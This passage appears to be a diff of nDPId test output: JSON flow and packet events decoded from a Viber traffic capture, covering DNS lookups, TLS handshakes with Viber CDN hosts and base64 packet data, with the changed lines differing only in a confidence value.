{"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1527155641813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155641813,"pkt":"AA6OMNv9MAdNo1+nCABFAABAH5VAAEARmafAqAARwKgAD539ADUALISKl70BAAABAAAAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQAB"} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1527155641840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641840,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXElAAEARXIjAqAAPwKgAEQA1nf0Al5UFl72BgAABAAUAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQABwAwABQABAAAGHQAfDmQxZmplOWdtM2QwNXQ4CmNsb3VkZnJvbnQDbmV0AMAwAAEAAQAAADsABDbmXTXAMAABAAEAAAA7AAQ25l1swDAAAQABAAAAOwAENuZdn8AwAAEAAQAAADsABDbmXWM="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155644240,"flow_last_seen":1527155644240,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1527155644240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1527155644240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644240,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0lAAEARXnTAqAARrNkXaqQJAbsAHwH3DO5PoOHayJNED10MJ0pTvsIOJQ7muOI="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1527155644243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644243,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0pAAEARXnPAqAARrNkXaqQJAbsAH4RqDO5PoOHayJNEEDIopLF1oa8UykhAnf8="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1527155644244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1527155644244,"pkt":"MAdNo1+nAA6OMNv9CABFAAAyAABAADoRu76s2RdqwKgAEQG7pAkAHohoAA5y\/VBeClgsOyCTlKKUc09Z1nXjEg=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1527155646819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155646819,"pkt":"AA6OMNv9MAdNo1+nCABFAABBI8dAAEARlXTAqAARwKgAD4oDADUALaw8\/YcBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1527155646840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1527155646840,"pkt":"MAdNo1+nAA6OMNv9CABFAABRXJhAAEARXJPAqAAPwKgAEQA1igMAPcYV\/YeBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAASsABKzZF04="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} 
